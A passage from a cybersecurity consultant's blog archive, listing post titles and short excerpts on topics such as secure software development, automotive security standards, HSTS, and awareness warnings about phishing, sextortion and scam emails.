and advanced tools is crucial, one often overlooked aspect is the training of employees. This article aims to - [Preventing Attacks and Securing the Supply Chain in the Security Software Industry](https://www.sorinmustaca.com/preventing-attacks-and-securing-the-supply-chain-in-the-security-software-industry/) - The security software industry plays a vital role in safeguarding sensitive data and protecting digital infrastructure. However, the industry itself faces a significant threat from supply chain attacks. Supply chain attacks occur when cybercriminals target vulnerabilities within the supply chain to compromise software or hardware products before they reach the end-users. By infiltrating the supply - [Securing the Secure: The Importance of Secure Software Practices in Security Software Development](https://www.sorinmustaca.com/securing-the-secure-the-importance-of-secure-software-practices-in-security-software-development/) - In an increasingly interconnected digital world, the importance of secure software cannot be overstated. Many people think that by using security software all their digital assets become automatically secured. However, it is crucial to recognize that security software itself is not inherently secure by default. To ensure the highest level of protection, security software must - [How to convince Top Management to invest in cybersecurity and secure software development](https://www.sorinmustaca.com/how-to-convince-top-management-to-invest-in-cybersecurity-and-secure-software-development/) - I've heard many times IT people and Software Developers complaining that they have difficulties to sensibilize their managers to invest more in cybersecurity. Also some employees of my customers in the cybersecurity consulting area show sometimes frustration when we are talking about priorities of their top management - cybersecurity is almost neveve one until it - [Strengthening the Security of Embedded Devices](https://www.sorinmustaca.com/strengthening-the-security-of-embedded-devices/) - Embedded devices are specialized computing systems designed to perform specific tasks or functions within a larger system. Unlike general-purpose computers, embedded devices are typically integrated into other devices or systems and are dedicated to carrying out a specific set of functions. They are often characterized by their compact size, low power consumption, and optimized performance - [Authentication vs. Authorization](https://www.sorinmustaca.com/authentication-vs-authorization/) - These two fundamental concepts play a pivotal role in ensuring the integrity and security of digital systems. While these terms are often used interchangeably, they represent distinct and equally essential aspects in the world of identity and access management (IAM), which safeguards sensitive information and resources . Executive summary Authentication confirms that users are who they - [Zero Trust in Cybersecurity: from myth to the guide](https://www.sorinmustaca.com/zero-trust-in-cybersecurity-from-myth-to-the-guide/) - Every single day I read news on various portals and on LinkedIn and I encounter a lot of buzz words. Most of the time I just smile recognizing the marketing b**it, and continue to scroll... This time, I found an article from the Germany's Federal Bureau of Information Security (BSI) and it was about Zero - [Demystifying cybersecurity terms: Policy, Standard, Procedure, Controls, Framework, Zero Trust](https://www.sorinmustaca.com/demystifying-cybersecurity-terms-policy-standard-procedure-controls-framework/) - I am often asked what is the difference between Policy, Standard, Procedure in cybersecurity. Well, here it is: 1. Cybersecurity Standard A cybersecurity standard is a set of guidelines, criteria, or best practices that organizations follow to ensure that their security controls and procedures align with industry standards or regulatory requirements. Standards provide a benchmark - [Thoughts on AI and Cybersecurity](https://www.sorinmustaca.com/thoughts-on-ai-and-cybersecurity/) - Being an CSSLP gives me access to various emails from (ISC)2. One of these announced me that there is a recording of a webinar about AI and Cybersecurity held by Steve Piper from CyberEdge. Very nice presentation of 1h, and I found out that there is a sequel to that on November 1st. So, following - [Artificial Intelligence vs. Machine Learning](https://www.sorinmustaca.com/artificial-intelligence-vs-machine-learning/) - I will write in the future a lot about AI and ML with focus on cybersecurity. I will mix AI and ML and other terms quite a lot, so I think it is necessary to have a base from where to start. For this reason, I created this page with the basics. I don't want - [ChatGPT and automotive cybersecurity #1/2: About CSMS from ISO 21434](https://www.sorinmustaca.com/chatgpt-and-automotive-cybersecurity-1-2-about-csms-from-iso-21434/) - As promised, I played more with ChatGPT and this time I started to dig a bit into cybersecurity for automotive. Since I am working these days on CSMS (based on ISO ECE 21434 and TISAX), part of my companies consulting offer for automotive I thought maybe I check what ChatGPT things about them. Unfortunately, nothing - [A brief history of software vulnerabilities in vehicles (Update 2023)](https://www.sorinmustaca.com/a-brief-history-of-software-vulnerabilities-in-vehicles-update-2023/) - https://www.sorinmustaca.com/a-brief-history-of-software-vulnerabilities-in-vehicles/ - [Checklist for how to become a business owner by selling your skills and passion](https://www.sorinmustaca.com/checklist-for-how-to-become-a-business-owner-by-selling-your-skills-and-passion/) - I've been asked many times what are the steps to build your own business. This is not a post about "how to...", the Internet and LinkedIn is full of them, but more like a checklist with things you should consider when opening a business to sell your skills and experience. If you are reading this, - [Targeted Phishing: Your auth password for [ user@host.com ] expires today !](https://www.sorinmustaca.com/targeted-phishing-your-auth-password-for-userhost-com-expires-today/) - It's been a while since I received a targeted phishing. This time it is on one of my email accounts hosted on Google, and strangely, their phishing filter did not catch this one. ITNotification sorin@mustaca.com Expiration Your Password for sorin@mustaca.com has expired today. You can change your Password or continue using current Access KEEP PASSWORD ->erased domain on geocities.com sorin@mustaca.com Admin. 2023 - [ChatGPT and copywriting](https://www.sorinmustaca.com/chatgpt-and-copywriting/) - I received a spam and the guy offered to have my corporate site re-written. He sent me an example of how it be like in a Google Docs document. The text was very artificial, kind of those written by ChatGPT (check my recent blog posts about this: www.sorinmustaca.com). I will write about this too. Original: We - [PayPal is teaching fraudsters how to create the perfect phishing email](https://www.sorinmustaca.com/paypal-is-teaching-fraudsters-how-to-create-the-perfect-phishing-email/) - PayPal is sending a lot of emails these days, one of these got me confused. I am sure now it is a valid email, but the multitude of different links in it and the confusing information is making this email very suspicious. Here is a summary of the email: Ihre Meinung ist uns - [So much hype about Chat GPT... here are some facts](https://www.sorinmustaca.com/so-much-hype-about-chat-gpt-here-are-some-facts/) - So much hype about ChatGPT these days.. But what does it mean? So, I gave it a try ... and I created an account. This is the first post from many about ChatGPT. First thing you see when you go on the page: CapabilitiesRemembers what user said earlier in the conversationAllows user to provide - [A brief history of software vulnerabilities in vehicles (Update 2023)](https://www.sorinmustaca.com/a-brief-history-of-software-vulnerabilities-in-vehicles/) - Updated in 2023: 2023: Sam Curry: Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More Kia, Honda, Infiniti, Nissan, Acura Fully remote lock, unlock, engine start, engine stop, precision locate, flash headlights, and honk vehicles using only the VIN number Fully remote account takeover and PII disclosure via - [I am worried: AV-Comparatives tests of Business Security products](https://www.sorinmustaca.com/i-am-worried-av-comparatives-tests-of-business-security-products/) - Av-Comparatives did a long-term test of security Business Products. The details can be seen here: https://www.av-comparatives.org/tests/business-security-test-august-september-2022-factsheet/ Initially, I wanted to write about this test because I was surprised to see how well Microsoft Defender performed. But then, I started to read the details, even if the full report will only be released in December 2022. - [(ISC)2 certification counts - how many CSSLP are out there?](https://www.sorinmustaca.com/isc2-certification-counts-how-many-csslp-are-out-there/) - (ISC)2 maintains this page https://www.isc2.org/member-counts.aspx# with the counts of all certifications per country. I wrote before about this here https://www.sorinmustaca.com/how-many-certified-secure-software-lifecycle-professionals-are-out-there/, but this was back in 2013 (1.5 years after I became certified) ! Some statistics: As of September 25 2013: 1168 CSSLP Romania 1 Germany 19 As of May 23 2022: 3008 CSSLP - [The lies and promises of House Automation](https://www.sorinmustaca.com/the-lies-and-promises-of-house-automation/) - If you are tech-savvy it is very probable that you have already a few "smart" devices at home: digital assistant (e.g. Amazon Alexa, Google Nest, Mini etc.) music players (e.g. Sonos, ) lights (e.g. Philips Hue) TV (pretty much all on the market) appliances (e.g. coffee machine, fridge, etc.) (e.g. Jura, Samsung) fire/smoke detectors (e.g. - [Takeovers in the IT-Security Industry](https://www.sorinmustaca.com/takeovers-in-the-it-security-industry/) - I just sow a post by AV-Comparatives called "AV-Comparatives Explains the Implications of Takeovers in the IT-Security Industry" The entire article is very interesting and it is worth reading. And it is also objective and valid as well! Great job, AV-Comparatives! What made me write this post is the graphic at the end of the - [Cyber Monday - enjoy the discounts safe !](https://www.sorinmustaca.com/cyber-monday-enjoy-the-discounts-safe/) - Today is Cyber Monday , a day when all webshops (and not only) give big discounts to many products they sell. Even if the discount campaigns of some webshops are incredible and too good to let it go, you should think twice before giving the order: the discount is for a product that everybody wants - [ENISA: ADVANCING SOFTWARE SECURITY IN THE EU](https://www.sorinmustaca.com/enisa-advancing-software-security-in-the-eu/) - While I was looking after some resources for a presentation, I found this interesting lecture from ENISA. Advancing Software Security in the EU Download PDF document, 622 KB This study discusses some key elements of software security and provides a concise overview of the most relevant existing approaches and standards while identifying shortcomings associated - [The importance of user names in Wordpress](https://www.sorinmustaca.com/the-importance-of-user-names-in-wordpress/) - I have a plugin that prevents multiple unsuccessful logins. As can be seen, the spammers try several combinations like: admin (the default), then site name, and several others. It is critical to create a user name that is different than the obvious names, especially the default username "admin". Another interesting thing is that I get - [BSI: Die Lage der IT-Sicherheit in Deutschland (German)](https://www.sorinmustaca.com/bsi-die-lage-der-it-sicherheit-in-deutschland-german/) - Quelle: https://www.bsi.bund.de/DE/Service-Navi/Publikationen/Lagebericht/lagebericht_node.html Malwarelage: Das vergangene Jahr war geprägt von einer deutlichen Ausweitung cyber-krimineller Erpressungsmethoden. Nicht nur die Anzahl der Schadprogramm-Varianten stieg zeitweise rasant an – mit bis zu 553.000 neuen Varianten pro Tag der höchste jemals gemessene Wert (siehe Kapitel Neue Schadprogramm-Varianten, Seite 11). Auch die Qualität der Angriffe nahm weiterhin beträchtlich zu. https://multimedia.gsb.bund.de/BSI/Video/Lagebericht/2021/lagebericht-1-Schadprogramm-Varianten.mp4 - [Cyber Diplomacy - a course from UN Office for Disarmament Affairs](https://www.sorinmustaca.com/cyber-diplomacy-a-course-from-un-office-for-disarmament-affairs/) - I just finished the online course "Cyber Diplomacy", a course from the United Nations Office for Disarmament Affairs. For me it was interesting to find out how much from the real world has been already applied to the cybersecurity world. Unfortunately, by seeing this, I realized that actually nobody cares about these UN resolutions. For - [CSSLP re-certified until 2024](https://www.sorinmustaca.com/csslp-re-certified-until-2024/) - ISC2 requires a recertification every 3 years. For this, you need to pay your fees and to make proof that you were active in the profession. This can be done by submitting for review the work that has been done in this certification cycle. And here are all 3 with links: - [New Android app for IT Security News with push notifications](https://www.sorinmustaca.com/new-android-app-for-it-security-news-with-push-notifications/) - ITSecurityNews.info is my security news aggregator, which collects RSS feeds and publishes them in Wordpress automatically. A long time ago I created an app using AppSpotr, but since then things have changed. So, I decided to write one myself. Of course, not from scratch, I took an open source project called fNotifier and changed it - [Twitter is strange when it comes to business accounts](https://www.sorinmustaca.com/twitter-is-strange-when-it-comes-to-business-accounts/) - I created my company's Twitter account, called @EndpointCS . Obviously, I tried to add the birth date of the company: 1.1.2015. Well, imagine what happened next with my brand new account: it got locked because the owner of the account must be at least 13 years old. And my company is only 6 years old. - [Stack Overflow introduces ... erm... copy/paste limitations](https://www.sorinmustaca.com/stack-overflow-introduces-erm-copy-paste-limitations/) - If you use Stack-Overflow today, you will be surprised to see this popup: This has caused an explosion of Reddit comments here: https://www.reddit.com/r/webdev/comments/mhkume/stack_overflows_new_copypaste_limit/ When you click on "Learn More", you get to see this : Aha, 3 keys for $39.99 ... riiiight :) If you click on the "Pre-order" you get to - [A post about searching a software developer on LinkedIn that didn't go as planned](https://www.sorinmustaca.com/a-post-about-searching-a-software-developer-on-linkedin-that-didnt-go-as-planned/) - I was and still am in need of a freelance Android developer with experience in Java. After trying all other possibilities (my own network) I decided to post the job on LinkedIn. Due to the special requirements of the project, I needed a very close and good cooperation between myself, the customer and the developer. - [Web Services: SOAP vs REST](https://www.sorinmustaca.com/web-services-soap-vs-rest/) - There is a permanent discussion going on and I have seen quite a lot of answers. SOAP (Simple Object Access Protocol) vs. REST (Representational State Transfer) Which one to use and when? Let's see first the main characteristics of both: S.No SOAP REST 1. SOAP stands for Simple Object Access Protocol. REST stands for Representational State - [Sign files unattended in batch mode while having an eToken (no password popup!) (updated)](https://www.sorinmustaca.com/sign-files-unattended-in-batch-mode-while-having-an-etoken-no-password-popup/) - Expanding on answers already in this thread, it is possible to provide the token password using the standard signtool program from microsoft. 1. Export your public certificate to a file from the SafeNet Client 2. Find your private key container name 3. Find your reader name 4. Format it all together The eToken CSP - [The Virus Bulletin Conference 2020 VBLocalhost is live and my video presentation is there](https://www.sorinmustaca.com/the-virus-bulletin-conference-2020-vblocalhost-is-live/) - Here is the conference link: https://vblocalhost.com/conference/ You need to register first (free). Here is my paper: One year later: challenges for young anti-malware products today I have to say that the VB team did a good job with the editing :) I think I was too nice with Defender :))) What do you - [Defender Application Control or Defender SmartScreen - what can you do to not be blocked by it](https://www.sorinmustaca.com/defender-application-control-or-defender-smartscreen-what-can-you-do-to-not-be-blocked-by-it/) - Ever wondered why do you get one of these popups for your Windows program, despite of the fact that it is signed with a standard code signing certificate ? Applications that are signed with a standard code signing certificates need to have a positive reputation in order to pass the Smart Screen filter. Microsoft establishes - [Speaking at the Virus Bulletin Conference 2020: 'One year later: Challenges for young anti-malware products today'](https://www.sorinmustaca.com/speaking-at-the-virus-bulletin-conference-2020-one-year-later-challenges-for-young-anti-malware-products-today/) - Source: https://vblocalhost.com/presentations/one-year-later-challenges-for-young-anti-malware-products-today/ A year ago, at VB2019 we presented for the first time an overview of how the anti-malware world looks from the perspective of a young company trying to enter the market: how they try to build products, how they try to enter the market, how they try to convert users, and what challenges - [Facebook advertising at its best](https://www.sorinmustaca.com/facebook-advertising-at-its-best/) - It is known that the Facebook advertising is very aggressive sometimes and that it very often fails. Very often I find strange ads and I click on the details in order to to see why was it displayed to me. If you click on Hide Ad: And then, for example, click on "Irrelevant": Then, - [Aggressive phishing against Strato.de customers](https://www.sorinmustaca.com/aggressive-phishing-against-strato-de-customers/) - Strato.de (now belonging to 1&1) is one of the biggests hosters in Germany. Since a few weeks we see a lot of emails containing various texts that try to convince the user to login to his strato.de account and perform some actions. Strato published on their blog also a post about these fake emails: https://strato.de/blog/achtung-aktuell-wieder-phishing-mails-im-namen-von-strato-im-umlauf/ - [My IT_SecurityNews account nominated for "Best tweeter" account in the European Cybersecurity Blogger Awards](https://www.sorinmustaca.com/my-it_securitynews-account-nominated-for-best-tweeter-account-in-the-european-cybersecurity-blogger-awards/) - European Cybersecurity Blogger Awards - VOTE FOR YOUR WINNERS: Vote here . Yes, it is a Google Form... but there is no malware or spam :) Don't forget to vote IT_SecurityNews! The seventh annual European Cybersecurity Blogger Awards sponsored by Qualys and powered by Eskenzi PR, will be bestowed upon the best cybersecurity bloggers, podcasters, - ["Your Site Has Been Hacked" ransomware email campaign in the wild](https://www.sorinmustaca.com/your-site-has-been-hacked-ransomware-email-campaign-in-the-wild/) - I was actually not expecting this kind of ransomware... I am used by now with "You're hacked", "You're infected"... and others alike , but this one with the website is actually really interesting. What I find very disturbing is the fact that there are 5 transactions. A few were for tests, I think, but there - [Hey, UniFi, why Java? Or "The Best way to destroy customer trust"](https://www.sorinmustaca.com/hey-unifi-why-java-or-the-best-way-to-destroy-customer-trust/) - I am using at home Unifi to extend my WiFi through two access points. I am writing this post as a user who paid good money for these devices and feels betraid and left alone in the dark by Unifi. While installing the Unifi Controller on new machine, I am prompted to install Java. I - [CSMS - Cyber Security Management System: New Regulations coming from ISO 21434 and WP.29](https://www.sorinmustaca.com/csms-cyber-security-management-system-new-regulations-coming-from-iso-21434-and-wp-29/) - A Cyber Security Management System (CSMS) is soon going to become mandatory for all vehicles manufacturers and suppliers. In the automotive industry, we are currently seeing that Cyber Security is already a critical success factor. Starting with July 2024, the type approval of vehicles will only be possible if a certified CSMS is available and - [People have started to read more about security !](https://www.sorinmustaca.com/people-have-started-to-read-more-about-security/) - Remember by Free eBook "Improve your security" available for free at https://www.improve-your-security.org ? It looks like I started to get more customers since the Corona Pandemic. There are almost 1000 readers ! Go ahead and download your copy for free: https://www.improve-your-security.org/download/ - [How to stay safe when being exclusively online](https://www.sorinmustaca.com/how-to-stay-safe-when-being-exclusively-online/) - EN https://www.europol.europa.eu/sites/default/files/documents/safe-at-home_final.pdf DE https://www.europol.europa.eu/sites/default/files/documents/safe-at-home_de.pdf RO https://www.europol.europa.eu/sites/default/files/documents/safe-at-home_ro.pdf More here: https://www.europol.europa.eu/activities-services/public-awareness-and-prevention-guides/make-your-home-cyber-safe-stronghold Recommendations: Wi-Fi: always change the default router password Install antivirus software on all devices connected to the internet Choose strong and different passwords for your email and social media accounts Review your apps' permissions and delete those you don’t use Back up your data and - [Nigerian Scam ? No, COVID-19 scam, from China](https://www.sorinmustaca.com/nigerian-scam-no-covid-19-scam-from-china/) - I sometimes can't stop to ask myself if the scammers are actually human beings with feelings of loss and tragedy and if they have the same concerns as the normal citizens. I guess they are not, because otherwise you can't explain this: Hello friend, I intend to give out some portion of my wealth - [Bitcoin scam related to the Corona virus](https://www.sorinmustaca.com/bitcoin-scam-related-to-the-corona-virus/) - As I mentioned before, there is a lot going on in the cyberspace related to the Corona virus. Unfortunately, many of the things circulating are scams or information that direct to malware. This is an email circulating currently in massive waves in various languages (here in German): Hallo Sorin Mustaca Falls Sie es noch - [Defending Against COVID-19 Cyber Scams](https://www.sorinmustaca.com/defending-against-covid-19-cyber-scams/) - I personally did not see a scam like this yet, so I quote here the CISA Newsletter.Source: National Cyber Awareness System: Defending Against COVID-19 Cyber Scams 03/06/2020 01:53 PM EST Original release date: March 6, 2020 The Cybersecurity and Infrastructure Security Agency (CISA) warns individuals to remain vigilant for scams related to Coronavirus Disease - ["Ha‌sta‌xla‌lyvi‌sta‌" says a "ha‌cke‌r" who tries to blackmail me using an obfuscated mail](https://www.sorinmustaca.com/ha‌sta‌xla‌lyvi‌sta‌-says-a-ha‌cke‌r-who-tries-to-blackmail-me-using-an-obfuscated-mail/) - We've seen millions of emails with blackmailing texts containing some username/email address and a password harvested from some hacked website. This one would be just another one, except that the text is obfuscated :) It looks interesting but it is tiresome to try to read it. And why the effort, in the end ? Below - [Interview in sputniknews.com: Experte zu Handy-Hacks: So kann man sich schützen](https://www.sorinmustaca.com/interview-in-sputniknews-com-experte-zu-handy-hacks-so-kann-man-sich-schutzen/) - Experte zu Handy-Hacks: So kann man sich schützen TECHNIK 14:04 04.02.2020Zum Kurzlink Von Bolle Selke Die USA hacken das Handy von Bundeskanzlerin Angela Merkel und Saudi-Arabien das von Amazon-Chef Jeff Bezos? Müssen sich also nur Prominente Sorgen um ihr Smartphone machen? Nein, sagt der IT-Experte Sorin Mustaca im Interview und erklärt, wie man sich schützen kann. - [Malicious emails sent in German on behalf of the Post](https://www.sorinmustaca.com/malicious-emails-sent-in-german-on-behalf-of-the-post/) - German users are receiving a lot of such spams these days: It is about a package which allegedly it has its transport costs not paid. (2 €). The user is invited to visit a page where he can be pay this. Verfolgen Sie Ihr Paket: DE3428632-19 STATUS: BEARBEITUNG - VERTEILERZENTRUM BERLIN - Transportkosten VON 2,00 - [Products of big security companies flagged as deceptors by Appesteem](https://www.sorinmustaca.com/products-of-big-security-companies-flagged-as-deceptors-by-appesteem/) - Appesteem maintains the Deceptor list, a list of programs who do not respect their requirements. The deceptor list contains most of the time emergent products who want to make $$$ very fast by using some gray-area techniques. I personally have never seen a product of any established company in this list. To my surprize, - [My presentation "Challenges for young anti-malware products today" accepted at the Virus Bulletin 2019 Conference in London](https://www.sorinmustaca.com/my-presentation-challenges-for-young-anti-malware-products-today-accepted-at-the-virus-bulletin-2019-conference-in-london/) - I am happy to inform everybody that my presentation "Challenges for young anti-malware products today" was accepted at the Virus Bulletin 2019 Conference in London. This is the abstract: "There are two categories of anti-malware vendors: Established anti-malware vendors, who are preoccupied with getting the best scores in detection tests and capturing more market share. - [Streaming content and smart TVs: The Ultimate Parent Guide for Protecting Your Child on the Internet](https://www.sorinmustaca.com/streaming-content-and-smart-tvs-the-ultimate-parent-guide-for-protecting-your-child-on-the-internet/) - We like to think back to a time when the whole family gathered around the TV to watch something wholesome together. (In reality, many of us probably had a TV in our rooms, and spent... Read more here: - [Interview with the SafetyDetective.com](https://www.sorinmustaca.com/interview-with-the-safetydetective-com/) - " Aviva Zacks of Safety Detective sat down with cybersecurity expert Sorin Mustaca. She learned that his company is helping to both educate customers and provide them with solutions to combat cyberthreats. " Read the entire text here: https://www.safetydetectives.com/blog/interview-sorin-mustaca/ Safety Detective has made it to the "In the news" page. - [Mobile phones and apps: The Ultimate Parent Guide for Protecting Your Child on the Internet](https://www.sorinmustaca.com/mobile-phones-and-apps-the-ultimate-parent-guide-for-protecting-your-child-on-the-internet/) - According to consumer research by Influence Central, the average age that children get their first smartphone is 10 years old. Giving your child a smartphone comes with numerous benefits. A phone is an excellent safety... Read more here: - [The Ultimate Parent Guide for Protecting Your Child on the Internet Series](https://www.sorinmustaca.com/the-ultimate-parent-guide-for-protecting-your-child-on-the-internet-series/) - You can see in the next 8 weeks a post per week about this topic. The short versions of these posts will be published here (from the RSS feed). The full version will always be on Improve-your-security.org Start reading here: https://www.improve-your-security.org/the-ultimate-parent-guide-for-protecting-your-child-on-the-internet-series/ Happy reading and try to apply some of these. - [At Infosec London this week](https://www.sorinmustaca.com/at-infosec-london-this-week/) - I am going to be visiting Infosecurity London from Tuesday to Thursday this week. If you are one of my friends or customers and you are around, ping me and we could meet. I am planning to attend the (ISC)2 Member Reception on Wednesday afternoon. Meet me at #Infoseclondon https://www.infosecurityeurope.com/ Click here to - [ISO27001 and GDPR](https://www.sorinmustaca.com/iso27001-and-gdpr/) - We are talking about Article 32 of GDPR: https://gdpr-info.eu/art-32-gdpr/ It basically says that you should have some measures in place in order to protect customer data by reducing the risk of a customer data to be lost or stolen(through a data breach, through classical theft, losing drives, making information public unintentionally an so on). - ["UNSUBSCRIBE ME!" or how to subscribe to spam lists](https://www.sorinmustaca.com/unsubscribe-me-or-how-to-subscribe-to-spam-lists/) - If you got one of these emails, do not click the link in it or the button. It will try to send an email to those email addressed below. Of course, it can't do that automatically, it will open an email with the subject "Unsubscribe me" and the To field prefilled with those email addresses. - [With so many breaches, a new industry appeared...](https://www.sorinmustaca.com/with-so-many-breaches-a-new-industry-appeared/) - Every week I hear about a new breach that lost millions or billions of accounts and "somebody" publishes them online. Do not forget to register at https://haveibeenpwned.com/ for real-time notification in case your email appeares somewhere online. Here is a new case of Sextorsion – it gets more technical this time. This is another very - [Sextorsion with “real” data – Do not pay!](https://www.sorinmustaca.com/sextorsion-with-real-data-do-not-pay/) - If you have received an email with the subject “Yuor password - ”, don’t freak out immediately. Yes, the “yuor” is written wrong, but this is how the fraudsters wrote it, not the author of this article. The fraudsters have used a dump with the email addresses and passwords from some hacked website, where you - [When Nikola Tesla in person writes you about your high electricity bills :)](https://www.sorinmustaca.com/when-nikola-tesla-in-person-writes-you-about-your-high-electricity-bills/) - Sometimes, looking after spams is also fun, not just research work. This is what I found today: Dear Energy User, If you pay for electricity, you`ve been hit hard by high energy prices. And, if you`re like most people, you`re thinking there`s got to be a better way. A better way to heat your home - [Targeted phishing for Amazon Credit Cards](https://www.sorinmustaca.com/targeted-phishing-for-amazon-credit-cards/) - This time, there is a phishing for Amazon Credit Cards, which are served by LBB Bank. The user is redirected twice to some URLs, which are reported as "DECEPTIVE" by Chrome. Unfortunately, the final pages were deleted, so I can't take screenshots. Hallo Sie haben (1) wichtige Nachricht auf Ihrem Konto LandesBank Berlin AG. - [Targeted phishing on customers of Strato.de](https://www.sorinmustaca.com/targeted-phishing-on-customers-of-strato-de/) - My domain mustaca.com is hosted at Strato.de. I received several such emails, showing that somebody really scrapes the next for finding targets of various ISPs. Lieber Kunde, Wir informieren Sie, dass die Domain mustaca.com ausläuft. Wie kann man sich erneuern ? Der Erneuerungs Vorgang ist schnell und einfach: bestellen Sie einfach online und bezahlen Sie - [Digital blackmailing - Sextorsion](https://www.sorinmustaca.com/digital-blackmailing/) - We are used to see ransomware encrypting files and requesting money (bitcoin) to decrypt them. I received now a new email on a corporate address, which is a black-e-mail ... in digital form. I have to say, that the amount of thoughts expressed in the email is interesting. Somebody, with some basic knowledge and bad - [SAFECODE.ORG: security fundamentals for developers](https://www.sorinmustaca.com/safecode-org-security-fundamentals-for-developers/) - If you don't know safecode.org, then stop reading this article and click here: https://safecode.org/about-safecode/ SAFECode – short for the Software Assurance Forum for Excellence in Code – spearheads a global, industry-wide effort to identify and promote best practices for developing and delivering more secure and reliable software, hardware and services. Here is a short film about - [Another Google Support Phishing? No...](https://www.sorinmustaca.com/another-google-support-phishing-no/) - The email below looks like a classical phishing trying to fool users to enter their details and get access to the Google account. But, if you check it, you will be redirected in two steps to an online Canadian pharmacy website. I wonder why so much trouble for a stupid Canadian pharma website? Do people - [Twitter fails in an endless loop with their purge initiative](https://www.sorinmustaca.com/twitter-fails-in-an-endless-loop-with-their-purge-initiative/) - I am having troubles with Twitter... They have suspended my account @sorinmustaca and there is no way I can get it back. Also the @it_securitynews is being constantly blocked, but I can unblock it. Background: If you read the news, you may have heard that Twitter is closing millions and millions of accounts. According - ["Independent" support hotlines and how to deal with them (updated: who is in the picture?)](https://www.sorinmustaca.com/independent-support-hotlines-and-how-to-deal-with-them/) - I got contacted by "Anatha anatha", a support specialist ( :))) - can't stop laughing) who is offering "free" support to Avira Antivirus customers. As the description says, they are "an independent Support Provider for Avira Antivirus" and they have a free telephone number (+ 49-800-181-0338) for all customers in Germany. A simple search for - [Nice present from (ISC)2 - CSSLP renewal for 3 years](https://www.sorinmustaca.com/nice-present-from-isc2-csslp-renewal-for-3-years/) - Six years ago I was writing here about getting my "Certified Secure Software Lifecycle Professional" certification: http://www.sorinmustaca.com/finally-officially-csslp-certified/ Two certification cycles in the future, meaning 6 years, I received an update for my diplom and some goodies: And inside the new diplom, the card and a pin. - [Additional Online Resources to improve your security online](https://www.sorinmustaca.com/additional-online-resources-to-improve-your-security-online-4/) - Keeping Your Child Safe on the Internet The Teen Years: How Parents Can Grant Their Teenager Privacy While Overseeing Their Well-Being at Home How To Understand And Handle Cyberbullying – Tip Sheet ... Want to get the book ? Get it from here: Improve your Security” - [The new Data Protection Law forces me to inform you about this!](https://www.sorinmustaca.com/the-new-data-protection-law-forces-me-to-inform-you-about-this/) - I know you subscribed manually on this site, but we need now to check that you are happy to continuing receiving emails from it. From the 25th of May 2018, the new Data Protection Law will apply (GDPR). To comply with this, I need to check that I have your permission to use your name(optional) - [Logginggate: Twitter has been logging your password in plain text all this time... and this is not all of it!](https://www.sorinmustaca.com/logginggate-twitter-has-been-logging-your-password-in-plain-text-all-this-time-and-this-is-not-all-of-it/) - Did you receive this email too ? Twitter is telling us that despite the fact that they stored the just the hashes of the passwords in their DB, they have been logging the plain text password in their backend. Stupid ?! Hell yes! But the even more stupid thing is this: WHY DO THEY SEND - [JavaScript vs. Java](https://www.sorinmustaca.com/javascript-vs-java/) - JavaScript and Java are similar in some ways but fundamentally different in some others. The JavaScript language resembles Java but does not have Java's static typing and strong type checking. JavaScript follows most Java expression syntax, naming conventions and basic control-flow constructs which was the reason why it was renamed from LiveScript to JavaScript. In - [Microsoft Updates Guideline on Windows Driver Security](https://www.sorinmustaca.com/microsoft-updates-guideline-on-windows-driver-security/) - Microsoft has released an updated guide on driver security. This new guide offers advice that developers could use to ensure Windows drivers are secured against basic attacks and preventable flaws. Driver Security Guidance This section contains information on enhancing driver security. In this section Topic Description Driver security checklist This topic provides a driver - [Microsoft takes on Potentially Unwanted Applications](https://www.sorinmustaca.com/microsoft-takes-on-potentially-unwanted-applications/) - Starting March 1, 2018, Windows Defender Antivirus and other Microsoft security products will classify programs that display coercive messages as unwanted software, which will be detected and removed. If you’re a software developer and want to validate the detection of your programs, visit the Windows Defender Security Intelligence portal. Unwanted software Identifying and analyzing unwanted software is a complex challenge. - [Economic Impact of Cybercrime— up to $600 billion (McAfee report)](https://www.sorinmustaca.com/economic-impact-of-cybercrime-up-to-600-billion-mcafee-report/) - Source: https://www.mcafee.com/us/resources/reports/restricted/economic-impact-cybercrime.pdf In 2014, taking into account the full range of costs, CSIS estimated that cybercrime cost the world between $345 billion and $445 billion. As a percentage of global GDP, cybercrime cost the global economy 0.62% of GDP in 2014. Using the same methods, CSIS now believe the range is now between $445 billion and $600 billion. Our - [Sumup: CPU hardware vulnerable to side-channel attacks (Meltdown, Spectre and more)](https://www.sorinmustaca.com/sumup-cpu-hardware-vulnerable-to-side-channel-attacks-meltdown-spectre-and-more/) - If you’re confused by the avalanche of early reports, denials, and conflicting statements about the massive security issues announced in the last days, don’t worry — you’re far from the only one. Here’s what you need to know about Meltdown and Spectre, the two huge bugs that affect practically every computer and device out there. - [Results of the experiment "HTTPS and HSTS for ITSecurityNews.info"](https://www.sorinmustaca.com/results-of-the-experiment-https-and-hsts-for-itsecuritynews-info/) - I wrote 4 months ago (Aug 14) about the switch to HTTPS per default on the new site ITSecurityNews.info. A week ago I wrote about the experiment of enhancing the headers of the website to show full compatibility with HSTS. http://www.sorinmustaca.com/experiment-started-https-for-itsecuritynews-info/ http://www.sorinmustaca.com/moving-to-hsts/ Now it is too early to say what impact the HSTS has - [Moving to HSTS](https://www.sorinmustaca.com/moving-to-hsts/) - HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably HSTS - [Chrome will distrust SSL certificates generated by Symantec](https://www.sorinmustaca.com/chrome-will-distrust-ssl-certificates-generated-by-symantec/) - I reviewed the headers of my IT Security News website https://www.itsecuritynews.info/ in order to add HSTS. This is what I can see in the headers. The certificate used to load https://www.itsecuritynews.info/ uses an SSL certificate that will be distrusted in an upcoming release of Chrome. Once distrusted, users will be prevented from loading this - [Targeted Phishing against Strato.de](https://www.sorinmustaca.com/targeted-phishing-against-strato-de/) - We have ta lot of phishing attempts in German against Strato.de: Subject: Wir haben ein Abrechnungsproblem festgestellt. Sehr geehrter Kunde, Wir haben ein Abrechnungsproblem festgestellt. Diese Art von Fehlern zeigt normalerweise an, dass die Kreditkarte abgelaufen ist oder Ihre Rechnungsadresse ist ungültig. Klicken Sie auf den folgenden Link, um Ihre Informationen zu aktualisieren: https://www.strato.de/apps/CustomerService#/skl - [Cybersecurity Engineering in the Automotive industry](https://www.sorinmustaca.com/cybersecurity-engineering-in-the-automotive-industry/) - A lot is happening in the Automotive industry these days. It has to do with connectivity, autonomous driving, autonomous parking, and so on. All these have one thing in 